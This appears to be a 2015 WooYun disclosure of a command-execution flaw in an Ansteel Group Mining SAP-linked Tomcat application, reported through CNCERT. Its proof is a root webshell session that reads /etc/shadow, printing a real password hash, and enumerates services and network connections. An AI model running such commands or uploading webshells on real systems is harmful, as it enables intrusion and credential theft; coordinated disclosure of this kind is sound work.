当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153705

漏洞标题:鞍钢集团矿业公司多个系统getshell

相关厂商:cncert国家互联网应急中心

漏洞作者: 朱元璋

提交时间:2015-11-12 08:26

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-12: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经确认,细节仅向厂商公开
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

详细说明:

00.png

0.png


a.png

b.png


同IP服务器的SAP系统**.**.**.**:8080/cpkManage/account/cpkLogin.action存在命令执行漏洞

000.png


直接上传木马到服务器

1.png

2.jpg

漏洞证明:

 
[/apache-tomcat-6.0.26/webapps/cpkManage/cpkManage/]$ whoami
root
/bin/sh: line 0: cd: /apache-tomcat-6.0.26/webapps/cpkManage/cpkManage/: 没有那个文件或目录
[/apache-tomcat-6.0.26/bin/]$ chkconfig --list
abrt-ccpp 0:关闭 1:关闭 2:关闭 3:启用 4:关闭 5:启用 6:关闭
abrt-oops 0:关闭 1:关闭 2:关闭 3:启用 4:关闭 5:启用 6:关闭
abrtd 0:关闭 1:关闭 2:关闭 3:启用 4:关闭 5:启用 6:关闭
acpid 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭
atd 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭
auditd 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭
autofs 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭
avahi-daemon 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭
certmonger 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭
cpuspeed 0:关闭 1:启用 2:启用 3:启用 4:启用 5:启用 6:关闭
crond 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭
cups 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭
haldaemon 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭
httpd 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭
hv_kvp_daemon 0:关闭 1:关闭 2:关闭 3:启用 4:关闭 5:启用 6:关闭
ip6tables 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭
iptables 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭
irqbalance 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭
kdump 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭
lvm2-monitor 0:关闭 1:启用 2:启用 3:启用 4:启用 5:启用 6:关闭
mdmonitor 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭
messagebus 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭
mysqld 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭
netconsole 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭
netfs 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭
network 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭
nfs 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭
nfslock 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭
ntpd 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭
ntpdate 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭
oddjobd 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭
portreserve 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭
postfix 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭
postgresql 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭
psacct 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭
quota_nld 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭
rdisc 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭
restorecond 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭
rngd 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭
rpcbind 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭
rpcgssd 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭
rpcidmapd 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭
rpcsvcgssd 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭
rsyslog 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭
saslauthd 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭
smartd 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭
sshd 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭
sssd 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭
sysstat 0:关闭 1:启用 2:启用 3:启用 4:启用 5:启用 6:关闭
tomcat6 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭
udev-post 0:关闭 1:启用 2:启用 3:启用 4:启用 5:启用 6:关闭
ypbind 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭
[/apache-tomcat-6.0.26/bin/]$ chkconfig --list atd
atd 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭
[/apache-tomcat-6.0.26/bin/]$ cat /etc/shadow
root:$6$7IWHBFS8tyjzG918$Gw1fuPXqtZbsnHRgN.FKGD7Pe5620GcRtzxyc83xWbkKFYNMwNJ5HZqM3X3uWLkv6FQ0GfpQMvOqZd4tAIfhz.:16129:0:99999:7:::
bin:*:15513:0:99999:7:::
daemon:*:15513:0:99999:7:::
adm:*:15513:0:99999:7:::
lp:*:15513:0:99999:7:::
sync:*:15513:0:99999:7:::
shutdown:*:15513:0:99999:7:::
halt:*:15513:0:99999:7:::
mail:*:15513:0:99999:7:::
uucp:*:15513:0:99999:7:::
operator:*:15513:0:99999:7:::
games:*:15513:0:99999:7:::
gopher:*:15513:0:99999:7:::
ftp:*:15513:0:99999:7:::
nobody:*:15513:0:99999:7:::
dbus:!!:16129::::::
vcsa:!!:16129::::::
rpc:!!:16129:0:99999:7:::
abrt:!!:16129::::::
apache:!!:16129::::::
haldaemon:!!:16129::::::
ntp:!!:16129::::::
saslauth:!!:16129::::::
postfix:!!:16129::::::
avahi:!!:16129::::::
rpcuser:!!:16129::::::
nfsnobody:!!:16129::::::
tomcat:!!:16129::::::
webalizer:!!:16129::::::
sshd:!!:16129::::::
postgres:!!:16129::::::
mysql:!!:16129::::::
tcpdump:!!:16129::::::
oprofile:!!:16129::::::
[/apache-tomcat-6.0.26/bin/]$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:15:5D:0A:BA:36
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
inet6 addr: fe80::215:5dff:fe0a:ba36/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:58283648 errors:0 dropped:0 overruns:0 frame:0
TX packets:265581 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:5278520920 (4.9 GiB) TX bytes:265824359 (253.5 MiB)
eth1 Link encap:Ethernet HWaddr 00:15:5D:0A:BA:37
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
inet6 addr: fe80::215:5dff:fe0a:ba37/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:59033471 errors:0 dropped:0 overruns:0 frame:0
TX packets:123015 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:5194826281 (4.8 GiB) TX bytes:83206472 (79.3 MiB)
lo Link encap:Local Loopback
inet addr:**.**.**.** Mask:**.**.**.**
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:145264 errors:0 dropped:0 overruns:0 frame:0
TX packets:145264 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:12406620 (11.8 MiB) TX bytes:12406620 (11.8 MiB)
[/apache-tomcat-6.0.26/bin/]$ cat /etc/resolv.conf
cat: /etc/resolv.conf: 没有那个文件或目录
[/apache-tomcat-6.0.26/bin/]$ bash prompt:
bash: prompt:: 没有那个文件或目录
[/apache-tomcat-6.0.26/bin/]$ lsb_release -a
LSB Version: :core-4.0-amd64:core-4.0-noarch:graphics-4.0-amd64:graphics-4.0-noarch:printing-4.0-amd64:printing-4.0-noarch
Distributor ID: CentOS
Description: CentOS release 6.3 (Final)
Release: 6.3
Codename: Final
[/apache-tomcat-6.0.26/bin/]$ netstat /na
usage: netstat [-veenNcCF] [<Af>] -r netstat {-V|--version|-h|--help}
netstat [-vnNcaeol] [<Socket> ...]
netstat { [-veenNac] -I[<Iface>] | [-veenNac] -i | [-cnNe] -M | -s } [delay]
-r, --route display routing table
-I, --interfaces=<Iface> display interface table for <Iface>
-i, --interfaces display interface table
-g, --groups display multicast group memberships
-s, --statistics display networking statistics (like SNMP)
-M, --masquerade display masqueraded connections
-v, --verbose be verbose
-n, --numeric don't resolve names
--numeric-hosts don't resolve host names
--numeric-ports don't resolve port names
--numeric-users don't resolve user names
-N, --symbolic resolve hardware names
-e, --extend display other/more information
-p, --programs display PID/Program name for sockets
-c, --continuous continuous listing
-l, --listening display listening server sockets
-a, --all, --listening display all sockets (default: connected)
-o, --timers display timers
-F, --fib display Forwarding Information Base (default)
-C, --cache display routing cache instead of FIB
-T, --notrim stop trimming long addresses
-Z, --context display SELinux security context for sockets
<Iface>: Name of interface to monitor/list.
<Socket>={-t|--tcp} {-u|--udp} {-S|--sctp} {-w|--raw} {-x|--unix} --ax25 --ipx --netrom
<AF>=Use '-A <af>' or '--<af>'; default: inet
List of possible address families (which support routing):
inet (DARPA Internet) inet6 (IPv6) ax25 (AMPR AX.25)
netrom (AMPR NET/ROM) ipx (Novell IPX) ddp (Appletalk DDP)
x25 (CCITT X.25)
[/apache-tomcat-6.0.26/bin/]$ netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 **.**.**.**:45734 **.**.**.**:* LISTEN
tcp 0 0 **.**.**.**:3306 **.**.**.**:* LISTEN
tcp 0 0 **.**.**.**:111 **.**.**.**:* LISTEN
tcp 0 0 **.**.**.**:22 **.**.**.**:* LISTEN
tcp 0 0 **.**.**.**:631 **.**.**.**:* LISTEN
tcp 0 0 **.**.**.**:25 **.**.**.**:* LISTEN
tcp 0 0 **.**.**.**:3306 **.**.**.**:57872 ESTABLISHED
tcp 0 0 **.**.**.**:3306 **.**.**.**:57873 ESTABLISHED
tcp 0 0 **.**.**.**:3306 **.**.**.**:57874 ESTABLISHED
tcp 0 0 ::ffff:**.**.**.**:8005 :::* LISTEN
tcp 0 0 :::8009 :::* LISTEN
tcp 0 0 :::37869 :::* LISTEN
tcp 0 0 :::111 :::* LISTEN
tcp 0 0 :::8080 :::* LISTEN
tcp 0 0 :::22 :::* LISTEN
tcp 0 0 ::1:631 :::* LISTEN
tcp 0 0 ::1:25 :::* LISTEN
tcp 0 0 ::ffff:**.**.**.**:57874 ::ffff:**.**.**.**:3306 ESTABLISHED
tcp 0 0 ::ffff:**.**.**.**:8080 ::ffff:**.**.**.**:7836 ESTABLISHED
tcp 0 0 ::ffff:**.**.**.**:57872 ::ffff:**.**.**.**:3306 ESTABLISHED
tcp 0 0 ::ffff:**.**.**.**:57873 ::ffff:**.**.**.**:3306 ESTABLISHED
udp 0 0 **.**.**.**:604 **.**.**.**:*
udp 0 0 **.**.**.**:5353 **.**.**.**:*
udp 0 0 **.**.**.**:111 **.**.**.**:*
udp 0 0 **.**.**.**:1008 **.**.**.**:*
udp 0 0 **.**.**.**:55414 **.**.**.**:*
udp 0 0 **.**.**.**:631 **.**.**.**:*
udp 0 0 **.**.**.**:51767 **.**.**.**:*
udp 0 0 :::53083 :::*
udp 0 0 :::111 :::*
udp 0 0 :::1008 :::*
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ACC ] STREAM LISTENING 13638 /var/run/abrt/abrt.socket
unix 2 [ ACC ] STREAM LISTENING 9007 @/com/ubuntu/upstart
unix 2 [ ACC ] STREAM LISTENING 12692 @/var/run/hald/dbus-yn83NJrxSE
unix 2 [ ACC ] STREAM LISTENING 12571 /var/run/cups/cups.sock
unix 2 [ ] DGRAM 9209 @/org/kernel/udev/udevd
unix 2 [ ACC ] STREAM LISTENING 11909 /var/run/rpcbind.sock
unix 2 [ ACC ] STREAM LISTENING 13479 public/cleanup
unix 2 [ ACC ] STREAM LISTENING 13486 private/tlsmgr
unix 2 [ ACC ] STREAM LISTENING 13490 private/rewrite
unix 2 [ ACC ] STREAM LISTENING 13494 private/bounce
unix 2 [ ACC ] STREAM LISTENING 13498 private/defer
unix 2 [ ACC ] STREAM LISTENING 13502 private/trace
unix 2 [ ACC ] STREAM LISTENING 13506 private/verify
unix 2 [ ACC ] STREAM LISTENING 13510 public/flush
unix 2 [ ACC ] STREAM LISTENING 13514 private/proxymap
unix 2 [ ACC ] STREAM LISTENING 13518 private/proxywrite
unix 2 [ ACC ] STREAM LISTENING 13522 private/smtp
unix 2 [ ACC ] STREAM LISTENING 13526 private/relay
unix 2 [ ACC ] STREAM LISTENING 13530 public/showq
unix 2 [ ACC ] STREAM LISTENING 13534 private/error
unix 2 [ ACC ] STREAM LISTENING 13538 private/retry
unix 2 [ ACC ] STREAM LISTENING 13542 private/discard
unix 2 [ ACC ] STREAM LISTENING 13546 private/local
unix 2 [ ACC ] STREAM LISTENING 13550 private/virtual
unix 2 [ ACC ] STREAM LISTENING 13554 private/lmtp
unix 2 [ ACC ] STREAM LISTENING 13558 private/anvil
unix 2 [ ACC ] STREAM LISTENING 13562 private/scache
unix 2 [ ] DGRAM 12714 @/org/freedesktop/hal/udev_event
unix 2 [ ACC ] STREAM LISTENING 12455 /var/run/dbus/system_bus_socket
unix 2 [ ACC ] STREAM LISTENING 12522 /var/run/avahi-daemon/socket
unix 2 [ ACC ] STREAM LISTENING 12649 /var/run/acpid.socket
unix 2 [ ACC ] STREAM LISTENING 13259 /var/lib/mysql/mysql.sock
unix 13 [ ] DGRAM 11699 /dev/log
unix 2 [ ACC ] STREAM LISTENING 12685 @/var/run/hald/dbus-2qGfjVmQG0
unix 2 [ ] DGRAM 177002
unix 3 [ ] STREAM CONNECTED 15263 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 15262
unix 3 [ ] STREAM CONNECTED 15225 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 15224
unix 3 [ ] STREAM CONNECTED 15209 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 15208
unix 3 [ ] STREAM CONNECTED 14733 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 14732
unix 3 [ ] STREAM CONNECTED 13990 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 13989
unix 2 [ ] DGRAM 13733
unix 2 [ ] DGRAM 13720
unix 2 [ ] DGRAM 13640
unix 2 [ ] DGRAM 13572
unix 3 [ ] STREAM CONNECTED 13565
unix 3 [ ] STREAM CONNECTED 13564
unix 3 [ ] STREAM CONNECTED 13561
unix 3 [ ] STREAM CONNECTED 13560
unix 3 [ ] STREAM CONNECTED 13557
unix 3 [ ] STREAM CONNECTED 13556
unix 3 [ ] STREAM CONNECTED 13553
unix 3 [ ] STREAM CONNECTED 13552
unix 3 [ ] STREAM CONNECTED 13549
unix 3 [ ] STREAM CONNECTED 13548
unix 3 [ ] STREAM CONNECTED 13545
unix 3 [ ] STREAM CONNECTED 13544
unix 3 [ ] STREAM CONNECTED 13541
unix 3 [ ] STREAM CONNECTED 13540
unix 3 [ ] STREAM CONNECTED 13537
unix 3 [ ] STREAM CONNECTED 13536
unix 3 [ ] STREAM CONNECTED 13533
unix 3 [ ] STREAM CONNECTED 13532
unix 3 [ ] STREAM CONNECTED 13529
unix 3 [ ] STREAM CONNECTED 13528
unix 3 [ ] STREAM CONNECTED 13525
unix 3 [ ] STREAM CONNECTED 13524
unix 3 [ ] STREAM CONNECTED 13521
unix 3 [ ] STREAM CONNECTED 13520
unix 3 [ ] STREAM CONNECTED 13517
unix 3 [ ] STREAM CONNECTED 13516
unix 3 [ ] STREAM CONNECTED 13513
unix 3 [ ] STREAM CONNECTED 13512
unix 3 [ ] STREAM CONNECTED 13509
unix 3 [ ] STREAM CONNECTED 13508
unix 3 [ ] STREAM CONNECTED 13505
unix 3 [ ] STREAM CONNECTED 13504
unix 3 [ ] STREAM CONNECTED 13501
unix 3 [ ] STREAM CONNECTED 13500
unix 3 [ ] STREAM CONNECTED 13497
unix 3 [ ] STREAM CONNECTED 13496
unix 3 [ ] STREAM CONNECTED 13493
unix 3 [ ] STREAM CONNECTED 13492
unix 3 [ ] STREAM CONNECTED 13489
unix 3 [ ] STREAM CONNECTED 13488
unix 3 [ ] STREAM CONNECTED 13485
unix 3 [ ] STREAM CONNECTED 13484
unix 3 [ ] STREAM CONNECTED 13482
unix 3 [ ] STREAM CONNECTED 13481
unix 3 [ ] STREAM CONNECTED 13476
unix 3 [ ] STREAM CONNECTED 13475
unix 3 [ ] STREAM CONNECTED 13473
unix 3 [ ] STREAM CONNECTED 13472
unix 2 [ ] DGRAM 13422
unix 2 [ ] DGRAM 13095
unix 2 [ ] DGRAM 13004
unix 3 [ ] STREAM CONNECTED 12924 /var/run/acpid.socket
unix 3 [ ] STREAM CONNECTED 12923
unix 3 [ ] STREAM CONNECTED 12918 @/var/run/hald/dbus-2qGfjVmQG0
unix 3 [ ] STREAM CONNECTED 12917
unix 3 [ ] STREAM CONNECTED 12878 @/var/run/hald/dbus-2qGfjVmQG0
unix 3 [ ] STREAM CONNECTED 12809
unix 3 [ ] STREAM CONNECTED 12709 @/var/run/hald/dbus-yn83NJrxSE
unix 3 [ ] STREAM CONNECTED 12708
unix 3 [ ] STREAM CONNECTED 12687 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 12686
unix 2 [ ] DGRAM 12653
unix 3 [ ] STREAM CONNECTED 12525 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 12524
unix 3 [ ] STREAM CONNECTED 12519
unix 3 [ ] STREAM CONNECTED 12518
unix 2 [ ] DGRAM 12515
unix 3 [ ] STREAM CONNECTED 12475 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 12474
unix 3 [ ] STREAM CONNECTED 12469
unix 3 [ ] STREAM CONNECTED 12468
unix 3 [ ] STREAM CONNECTED 12287
unix 3 [ ] STREAM CONNECTED 12286
unix 2 [ ] DGRAM 12005
unix 3 [ ] DGRAM 9226
unix 3 [ ] DGRAM 9225
[/apache-tomcat-6.0.26/bin/]$   

修复方案:

加强安全意识

版权声明:转载请注明来源 朱元璋@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-11-24 09:36

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给辽宁分中心,由辽宁分中心后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评价